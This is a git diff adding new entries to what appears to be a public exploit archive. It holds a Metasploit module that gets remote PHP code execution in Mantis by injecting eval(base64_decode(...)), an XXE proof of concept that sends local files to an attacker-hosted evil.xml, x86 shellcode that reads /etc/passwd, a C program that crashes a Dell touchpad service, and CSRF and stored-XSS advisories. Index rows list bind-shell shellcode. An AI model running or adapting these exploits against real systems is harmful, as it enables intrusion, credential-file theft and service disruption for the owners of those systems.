diff --git a/exploits/hardware/webapps/44606.html b/exploits/hardware/webapps/44606.html
new file mode 100644
index 000000000..2c78c3c70
--- /dev/null
+++ b/exploits/hardware/webapps/44606.html
@@ -0,0 +1,42 @@
+# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
+# Date: 09-05-2018
+# Exploit Authors: Raffaele Sabato
+# Contact: https://twitter.com/syrion89
+# Vendor: Fastweb
+# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
+# Version: 0.00.47
+# CVE: CVE-2018-6023
+
+I DESCRIPTION
+========================================================================
+
+An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc.
+The vulnerability was disclosed to Fastweb on 19 January 2018.
+Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018.
+
+II PROOF OF CONCEPT
+========================================================================
+
+## Activate Gues Wi-Fi:
+
+
+
+
+
+
+
+
+III REFERENCES
+========================================================================
+http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
\ No newline at end of file
diff --git a/exploits/java/webapps/44607.txt b/exploits/java/webapps/44607.txt
new file mode 100644
index 000000000..c2a524288
--- /dev/null
+++ b/exploits/java/webapps/44607.txt
@@ -0,0 +1,53 @@
+[+] Exploit Title: ModbusPal XXE Injection
+[+] Date: 05-08-2018
+[+] Exploit Author: Trent Gordon
+[+] Vendor Homepage: http://modbuspal.sourceforge.net/
+[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
+[+] Version: 1.6b
+[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151
+[+] CVE: CVE-2018-10832
+
+1. Vulnerability Description
+
+ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.
+
+2. Proof of Concept
+
+a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)
+
+b.) Contents of hosted "evil.xml"
+
+
+">
+
+c.) Example Exploited "xxe.xmpa"
+
+
+
+
+
+
+
+%sp;
+
+%param1;
+
+]>
+
+&exfil;
+
+
+
+
+
+
+
+
+
+
+
+3. Additional Details
+
+Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.
\ No newline at end of file
diff --git a/exploits/php/remote/44611.rb b/exploits/php/remote/44611.rb
new file mode 100755
index 000000000..ef2dbfc9f
--- /dev/null
+++ b/exploits/php/remote/44611.rb
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Mantis manage_proj_page PHP Code Execution',
+ 'Description' => %q{
+ Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote
+ Code Execution vulnerability in the sort parameter of the
+ manage_proj_page.php page.
+ },
+ 'Author' => [
+ 'EgiX', # Exploit-DB Entry Author
+ 'Lars Sorenson' # MSF module author
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['EDB', '6768'],
+ ['CVE', '2008-4687'],
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Mantis <= 1.1.3', { } ],
+ ],
+ 'DisclosureDate' => 'Oct 16, 2008',
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']),
+ OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']),
+ OptString.new('PASSWORD', [true, 'The password to log in with', 'root']),
+ ])
+ end
+
+ def check
+ vprint_status('Checking Mantis version ...')
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'login_page.php'),
+ 'method' => 'GET'
+ })
+
+ unless res
+ vprint_error('Connection to host failed!')
+ return CheckCode::Unknown
+ end
+
+ unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/
+ vprint_error('Cannot determine Mantis version!')
+ return CheckCode::Unknown
+ end
+
+ version = Gem::Version.new(Regexp.last_match[1])
+
+ vprint_status("Mantis version #{version} detected")
+
+ if res.code == 200 && version <= Gem::Version.new('1.1.3')
+ return CheckCode::Appears
+ end
+
+ CheckCode::Safe
+ end
+
+ def login
+ vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'login_page.php'),
+ })
+ unless res
+ fail_with(Failure::Unreachable, 'Cannot access host to log in!')
+ end
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'login.php'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'username': datastore['username'],
+ 'password': datastore['password'],
+ },
+ 'cookie'=> "PHPSESSID=#{res.get_cookies}"
+ })
+ unless res
+ fail_with(Failure::Unknown, 'Cannot access host to log in!')
+ end
+
+ fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302
+ fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php')
+
+ store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+ res.get_cookies
+ end
+
+ def exploit
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears
+
+ cookie = login
+ vprint_status('Sending payload ...')
+ payload_b64 = Rex::Text.encode_base64(payload.encoded)
+ data = {
+ 'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#",
+ }
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'manage_proj_page.php'),
+ 'method' => 'POST',
+ 'vars_post' => data,
+ 'headers' => {
+ 'Connection': 'close',
+ 'Cookie': cookie.to_s,
+ 'Cmd': payload_b64
+ }
+ })
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/44608.txt b/exploits/php/webapps/44608.txt
new file mode 100644
index 000000000..afd729942
--- /dev/null
+++ b/exploits/php/webapps/44608.txt
@@ -0,0 +1,28 @@
+# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
+# Date: 4/20/2018
+# Author: 0xB9
+# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=914
+# Version: 1.1
+# Tested on: Ubuntu 17.10
+# CVE: CVE-2018-10580
+
+
+1. Description:
+Adds a new section to user profiles that will display their last posts.
+
+
+2. Proof of Concept:
+
+Persistent XSS
+- Create a thread with the following subject
+- Now visit your profile to see the alert.
+
+
+3. Solution:
+I reported the plugin twice over the past 3 weeks and recieved no response.
+
+
+The following should be added in line 236 to properly sanitize thread subjects.
+
+$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);
\ No newline at end of file
diff --git a/exploits/windows/dos/44610.c b/exploits/windows/dos/44610.c
new file mode 100644
index 000000000..bf24f5ee6
--- /dev/null
+++ b/exploits/windows/dos/44610.c
@@ -0,0 +1,112 @@
+/*
+Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
+Author: Souhail Hammou
+Vendor Homepage: https://www.alps.com/
+Tested on : Alps Pointing-device Driver 10.1.101.207
+CVE: CVE-2018-10828
+*/
+
+#include
+#include
+#include
+
+/*
+Details:
+==========
+ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc
+allows the current user to map and write to the "ApMsgFwd File Mapping Object" section.
+ApMsgFwd.exe uses the data written to the section as arguments to functions.
+This causes a denial of service condition when invalid pointers are written to the mapped section.
+
+The crash :
+===========
+(b88.aa0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+KERNELBASE!MultiByteToWideChar+0x3d8:
+00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
+0:004> r
+rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
+rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
+rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
+ r8=0000000000000000 r9=00000000ffffffff r10=0000000000000000
+r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
+r14=0000000000000000 r15=0000000000563e40
+iopl=0 nv up ei pl zr na po nc
+cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
+KERNELBASE!MultiByteToWideChar+0x3d8:
+00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
+
+
+0:001> lm v m ApMsgFwd
+Browse full module list
+start end module name
+00000000`00400000 00000000`00415000 ApMsgFwd (no symbols)
+ Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
+ Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
+ Image name: ApMsgFwd.exe
+ Browse all global symbols functions data
+ Timestamp: Tue Jul 1 09:03:05 2014 (53B27949)
+ CheckSum: 00020F5D
+ ImageSize: 00015000
+ File version: 8.1.0.44
+ Product version: 8.1.0.44
+ File flags: 0 (Mask 3F)
+ File OS: 40004 NT Win32
+ File type: 1.0 App
+ File date: 00000000.00000000
+ Translations: 0411.04b0
+ CompanyName: Alps Electric Co., Ltd.
+ ProductName: ApMsgFwd
+ InternalName: ApMsgFwd
+ OriginalFilename: ApMsgFwd.exe
+ ProductVersion: 8, 1, 0, 44
+ FileVersion: 8, 1, 0, 44
+ PrivateBuild: 8, 1, 0, 44
+ SpecialBuild: 8, 1, 0, 44
+ FileDescription: ApMsgFwd
+ LegalCopyright: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+ LegalTrademarks: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+ Comments: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+*/
+int main(int argc, char** argv)
+{
+ HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
+ PBYTE MappedBuf;
+
+ if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
+ {
+ printf("OpenFileMapping Failed !\n");
+ goto ret;
+ }
+
+ if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
+ {
+ printf("MapViewOfFile Failed !\n");
+ goto cleanup_0;
+ }
+
+ StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");
+
+ if ( ! StartEvtHnd )
+ {
+ printf("OpenEvent Failed !\n");
+ goto cleanup_1;
+ }
+
+ ZeroMemory(MappedBuf,0x1A0);
+ *MappedBuf = 9; //switch case 9
+ *(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
+ *(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;
+
+ /*Wake up the waiting thread*/
+ SetEvent(StartEvtHnd);
+
+ CloseHandle(StartEvtHnd);
+cleanup_1:
+ UnmapViewOfFile(MappedBuf);
+cleanup_0:
+ CloseHandle(ApMpHnd);
+ret:
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/webapps/44497.txt b/exploits/windows/webapps/44497.txt
index df89b19d3..c831b00ef 100644
--- a/exploits/windows/webapps/44497.txt
+++ b/exploits/windows/webapps/44497.txt
@@ -3,6 +3,8 @@
# Software Vendor: NComputing
# Software Link:
# Author: Javier Bernardo
+# Contact: javier@kwell.net
+# Website: http://www.kwell.net
# CVE: CVE-2018-10201
# Category: Webapps
diff --git a/files_exploits.csv b/files_exploits.csv
index ebeca03fd..d44265b8c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5968,6 +5968,7 @@ id,file,description,date,author,type,platform,port
44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
+44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16480,6 +16481,7 @@ id,file,description,date,author,type,platform,port
44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39292,3 +39294,6 @@ id,file,description,date,author,type,platform,port
44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,
+44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
+44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
+44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3dfea168b..fbd0d2cf0 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -882,3 +882,4 @@ id,file,description,date,author,type,platform
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
+44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44609.c b/shellcodes/linux_x86/44609.c
new file mode 100644
index 000000000..44fad83b5
--- /dev/null
+++ b/shellcodes/linux_x86/44609.c
@@ -0,0 +1,66 @@
+/*
+; Title : Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
+; Date : May, 2018
+; Author : Nuno Freitas
+; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/
+; Twitter : @nunof11
+; SLAE ID : SLAE-1112
+; Size : 62 bytes
+; Tested on : i686 GNU/Linux
+
+section .text
+
+global _start
+
+_start:
+ xor eax, eax
+ jmp two
+
+one:
+ pop ebx
+ mov al, 0x5
+ int 0x80
+ mov esi, eax
+ jmp read
+
+exit:
+ mov al, 0x1
+ xor ebx, ebx
+ int 0x80
+
+read:
+ mov ebx, esi
+ mov al, 0x3
+ mov ecx, esp
+ mov dl, 0x01
+ int 0x80
+
+ xor ebx, ebx
+ cmp eax, ebx
+ je exit
+
+ mov al, 0x4
+ mov bl, 0x1
+ int 0x80
+
+ inc esp
+ jmp read
+
+two:
+ call one
+ string: db "/etc/passwd"
+*/
+
+#include
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+void main()
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file